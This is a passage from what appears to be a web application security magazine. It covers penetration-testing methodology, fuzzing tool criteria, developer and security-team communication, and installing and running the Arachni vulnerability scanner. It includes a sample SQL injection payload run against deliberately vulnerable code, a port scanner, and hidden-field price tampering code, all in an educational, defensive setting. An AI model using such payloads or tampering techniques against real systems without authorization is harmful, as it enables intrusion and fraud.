• Source Code Analysis (White Box) – In this approach the penetration test team has full information about the application and its source code. In such a test the security team will do a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial-of-service attack against it, or use such flaws to gain access to the internal network.
It is also important to point out that penetration testing can be achieved through two different types of testing:
• External penetration testing
• Internal penetration testing
Both types of testing can be conducted with little information (black box) or with full information (white box).
Figure 2: The different phases of pen testing
Figure 3 shows the different procedures and steps that can be used to conduct the penetration testing. The following is a description of these steps:
• Scope and Plan – In this step the scope of the penetration testing is identified, and the project plan and resources are defined.
• System Scan and Probe – In this step the system scanning under the defined scope of the project is conducted; the automated scanners examine the open ports and scan the system to detect vulnerabilities, and hostnames and IP addresses previously collected are used at this stage.
• Creation of Attack Strategies – In this step the testers prioritize the systems and the attack methods to be used, based on the type of system and how critical these systems are. Also at this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step the exploitation of vulnerabilities using the automated tools is conducted; the attack methods designed in the previous phase are used to conduct the following tests: data & service pilferage, buffer overflow, privilege escalation and denial of service (if applicable).
• Documentation – In this step all the vulnerabilities discovered during the test are documented; evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools
Throughout pen testing, a specific structured methodology has to be followed, in which the following steps might be used: enumeration, vulnerability assessment and exploitation. Some of the tools that might be used within these steps are:

• Port scanners
• Sniffers
• Proxy servers
• Site crawlers
• Manual inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s) and any intermediary devices such as firewalls and load balancers. It is also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields and HTML page sources should be part of the security assessment as well.
Some of the areas that can be covered during the vulnerability assessment are the following:

• Input validation
• Access control
Figure 3: Testing techniques, procedures and steps
• Authentication and session management (session ID flaws) vulnerabilities
• Cross-site scripting (XSS) vulnerabilities
• Buffer overflows
• Injection flaws
• Error handling
• Insecure storage
• Denial of service (if required)
• Configuration management
• Business logic flaws
• SQL injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client-side and header manipulation
• Unintended information disclosure
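To illustrate one item from the list, SQL injection faults arise when user input is concatenated into query text; parameterized statements are the standard remedy. A minimal sketch using Python's built-in sqlite3 module (the schema and data are invented for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

def find_user_unsafe(name):
    # VULNERABLE: input is spliced directly into the SQL text.
    return conn.execute(
        f"SELECT role FROM users WHERE name = '{name}'").fetchall()

def find_user_safe(name):
    # SAFE: the driver binds the value; it can never alter the query.
    return conn.execute(
        "SELECT role FROM users WHERE name = ?", (name,)).fetchall()

payload = "' OR '1'='1"
print(find_user_unsafe(payload))  # returns every row: injection worked
print(find_user_safe(payload))    # returns nothing: input treated as data
```

The same classic `' OR '1'='1` payload is what a tester would try first against a login or search form during the assessment.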
During the assessment, testing of the above vulnerabilities is performed, except those that could cause denial-of-service conditions, which are usually discussed beforehand. Possible options for denial-of-service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations and comments are summarized, and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. The port scanning tools usually examine or query each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. The configuration flexibility in port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
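The simplest technique such scanners use, a full TCP connect() check, can be sketched in a few lines of Python; real tools such as Nmap add SYN scanning, timing control and service fingerprinting on top of this idea.

```python
import socket

def is_port_open(host, port, timeout=0.5):
    """Attempt a full TCP connection; success means a service is
    listening. connect_ex returns 0 on success instead of raising."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0

def scan(host, ports):
    """Return the subset of ports that accepted a connection."""
    return [p for p in ports if is_port_open(host, p)]
```

For example, `scan("127.0.0.1", range(20, 1025))` would enumerate listening services on the well-known ports of the local machine. Only scan hosts you are authorized to test.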
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most of the commercial and open source scanners scan the operating system for known weaknesses and unpatched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard or Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxies
Assessment proxies work by interposing themselves between the web browser used by the tester and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and its associated components. For example, the penetration tester can view all cookies, hidden HTML fields and other data used by the web application, and attempt to manipulate their values to trick the application.
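As a simplified illustration of the kind of manipulation an assessment proxy enables, the sketch below rewrites a hidden form field in an intercepted HTML response. A real proxy such as Burp Suite does this on live HTTP traffic; the form and field names here are hypothetical:

```python
import re

def tamper_hidden_field(html, name, new_value):
    """Rewrite the value of a hidden <input> field in intercepted HTML."""
    pattern = (r'(<input[^>]*type="hidden"[^>]*name="%s"[^>]*value=")[^"]*(")'
               % re.escape(name))
    # \g<1> and \g<2> keep the surrounding markup intact
    return re.sub(pattern, r'\g<1>%s\g<2>' % new_value, html)

# A server that trusts this hidden field can be tricked by the proxy:
form = '<input type="hidden" name="price" value="100.00">'
tampered = tamper_hidden_field(form, "price", "0.01")
```

If the application honours the tampered value, the tester has demonstrated that server-side validation is missing.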
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform the standard penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used for the feedback and reporting of the test results
• Extensibility – The tool can be customized, and it must provide a scripting language or plug-in capabilities that can be used to construct customized penetration tests
• Configurability – A tool that can be configured is highly recommended, to ensure the flexibility of the implementation process
• Documentation – The tool should provide proper documentation that clearly explains the probes performed during the penetration testing
• License Flexibility – A tool that can be used without specific constraints, such as a particular range of IP numbers or license limits, is a better tool than others
Security Techniques for Web Apps
Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookies, XML, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting and other attacks against the web application.
• Validate data before form submission and manage sessions – Cross-Site Request Forgery (CSRF) can occur when a web application accepts form submission data without verifying that it came from its own web form. To avoid it, it is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for the web application's users and to protect stored passwords.
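The first two guidelines can be sketched in Python: parameterized queries keep attacker input out of the SQL grammar, output escaping defuses script payloads, and a random per-session token lets the application verify that a form submission originated from a form it served. This is a minimal sketch; the `SESSION` dict stands in for a real server-side session store:

```python
import html
import hmac
import secrets
import sqlite3

# --- Input handling: parameterize queries, escape output ---
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT)")
db.execute("INSERT INTO users VALUES ('alice')")

def find_user(name):
    # Placeholder binding keeps attacker input out of the SQL grammar.
    return db.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()

def render_comment(comment):
    # Escape user data before embedding it in HTML.
    return "<p>%s</p>" % html.escape(comment)

# --- CSRF: issue a token with the form, require it on submission ---
SESSION = {}  # stand-in for a real session store

def issue_csrf_token():
    token = secrets.token_hex(16)
    SESSION["csrf"] = token
    return token

def verify_csrf_token(submitted):
    expected = SESSION.get("csrf", "")
    # Constant-time comparison avoids timing side channels.
    return hmac.compare_digest(expected, submitted)
```

With this in place, a classic `' OR '1'='1` payload is treated as a literal user name rather than SQL, and a forged cross-site request fails the token check.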
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying and ranking the vulnerabilities in a system, where such a process determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessment will continue, over time, to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools can't be used as a complete replacement for manual penetration testing. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, especially for the logical vulnerabilities that automated testing misses.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money and effort required to assess thousands of web applications will increase the use of automated tools rather than the human factor for manually testing these applications. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements for a fuzzing tool and also look at the most common mistakes people make with fuzzing.

PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer, and what are the qualities that a fuzzing tool should have?

Model-based test suites – Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.

Easy to use – Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need the domain expertise from the target system to execute tests.

Automated – Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.

Test coverage – Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.

Scalable – Time is almost always an issue when it comes to testing. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can use more time in testing and can select other test completion criteria. The user must also have control over the fuzzing parameters, such as test coverage.

Documented test cases – When a bug is found, it needs to be documented for your internal developers or for vulnerability management toward third-party developers. When there are billions of test cases, automated documentation is the only possible solution.

Remediation – All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers, so that they can start developing a fix for the found issues.

MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts – Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.

Ticking off the fuzzing check-box – If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution: this is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in the software.

Using hardware test beds – Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you to where testing is needed, and are not locked to a physical test lab.

Unprepared for the cloud – A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups, where you can easily copy the setup to your colleagues or upload it to cloud setups.
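To make the contrast with model-based fuzzing concrete, here is a sketch of the naive random-mutation approach described above: it flips a few bytes of a valid sample and records any unhandled exception as a finding. All names are illustrative; real tools derive test cases from protocol models instead of blind mutation:

```python
import random

def mutate(sample, n_flips=3):
    """Flip a few random bytes of a valid sample to produce an anomalous input."""
    data = bytearray(sample)
    for _ in range(n_flips):
        data[random.randrange(len(data))] = random.randrange(256)
    return bytes(data)

def fuzz(target, sample, rounds=2000, seed=0):
    """Feed mutated inputs to `target`; any unhandled exception is a finding."""
    random.seed(seed)  # fixed seed: every finding can be replayed exactly
    findings = []
    for _ in range(rounds):
        case = mutate(sample)
        try:
            target(case)
        except Exception as exc:
            findings.append((case, repr(exc)))  # document the failing test case
    return findings
```

Note how the reproducibility and documentation requirements show up even in this toy: without the recorded seed and failing inputs, a crash could not be handed to developers for remediation.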
WEB APP SECURITY
Developers are from Venus, Application Security guys are from Mars

We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.

Application Security members are considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into Production. Actually, it is a little of everyone's fault. Since Security people and Developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve.

Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario. The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers for something like Give us the latest Web 2.0, Social-website-enabled thing, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep.

The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor do they allow time for security fixes or remediation.

Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment, when someone recalls something about security: Hey, we need to get this on-line. So we need to open up the firewall to allow access to it.

The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that Management has imposed on them. On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?

One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom. For example, the report might have statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem is when the two groups talk to each other at the end of the whole process using a non-common-ground language that further confuses or annoys everyone and pushes the groups further apart.

Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information that can pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.

Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class or line where the problem exists, so that they can fix it. If provided enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production.

Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:

• Creating a development framework that has security built into it
• Designing an API to be used by the application

Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward to assist developers with this problem. This methodology works with a programming language that contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra have some security facilities as well). In the Java programming language community there are a lot of non-standardized frameworks available for Java developers, but which is the right one to use to ensure secure code development?

.NET has one single monolithic framework, and Microsoft has invested money in security. It seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.

The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach. The security team and the application developers are now on the same page, and everyone is happy.

There is a third approach that I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward. Using the WAPT activity, instead of an implement a filtering policy statement you will produce a set of rspec/cucumber scenarios modeling how the source code can deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases, and when testing is complete and all tests pass, it will mean your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group.

In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.

PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He is interested in code review and is working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practicing Tae kwon-do ITF martial art. He is a husband and a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can be better compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction by the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset, and must choose the best possible combination of tools for the job at hand. Is Arachni worthwhile?
Time for an in-depth review
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity – everything is simple and straightforward, from a user's or a component developer's point of view
• A stable, efficient and high-performance framework – Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details
Pulling the Legs of Arachni
Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1. Overview of Audit and Reconnaissance modules included with Arachni

Audit Modules: SQL injection; Blind SQL injection using rDiff analysis; Blind SQL injection using timing attacks; CSRF detection; Code injection (PHP, Ruby, Python, JSP, ASP.NET); Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET); LDAP injection; Path traversal; Response splitting; OS command injection (*nix, Windows); Blind OS command injection using timing attacks (*nix, Windows); Remote file inclusion; Unvalidated redirects; XPath injection; Path XSS; URI XSS; XSS; XSS in event attributes of HTML elements; XSS in HTML tags; XSS in HTML script tags

Recon Modules: Allowed HTTP methods; Back-up files; Common directories; Common files; HTTP PUT; Insufficient Transport Layer Protection for password forms; WebDAV detection; HTTP TRACE detection; Credit card number disclosure; CVS/SVN user disclosure; Private IP address disclosure; Common backdoors; .htaccess LIMIT misconfiguration; Interesting responses; HTML object grepper; E-mail address disclosure; US Social Security Number disclosure; Forceful directory listing
We can vouch that both the simplicity and the performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.

Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.

The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.

The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.

At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler is always run at the start of the scan. This crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.

The HTML parser can extract forms, links, cookies and headers. It can gracefully handle badly written HTML, due to a combination of regular expression analysis and the Nokogiri HTML parser.

Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of audit modules and reconnaissance (recon) modules; Table 1 provides an overview.

Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.

Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of currently available plug-ins.

Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy – Analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form-based AutoLogin – Performs an automated login
• Dictionary attacker – Performs dictionary attacks against HTTP authentication and form-based authentication
• Profiler – Performs taint analysis with benign inputs and response time analysis
• Cookie collector – Keeps track of cookies while establishing a timeline of the changes
• Healthmap – Generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types – Logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector – Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules – Loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle – Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  • TimeoutNotice – Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  • Uniformity – Reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization

Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid). This is great if you want to speed up the scan, or if you want to execute some crazy things like running your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.

Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need to update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew this was not going to be a smooth ride. Since v0.3, some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of any packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually means recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note that these are the same commands as for the Linux installation): see Listing 2.
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/local.so.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/local.so.lst
Exit ash
Light My Fire
How to fire up Arachni depends on whether you want to use the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line.
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1 Edit Dispatchers
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan – start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far along the process is.
• Modules – enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins – plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, …
• Settings – the settings screen allows you to add cookies and headers, limit the scan to certain directories, …
• Reports – gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons – three add-ons are installed:
  • Auto-deploy – converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial – serves as an example
  • Scheduler – schedules and runs scan jobs at a specific time
• Log – overview of actions taken by the GUI
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:

$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr

Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html

That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:

$ arachni --help

Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:

$ arachni --lsmod

Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:

$ arachni --mods=*,-xss_* http://www.example.com

The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.

The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.

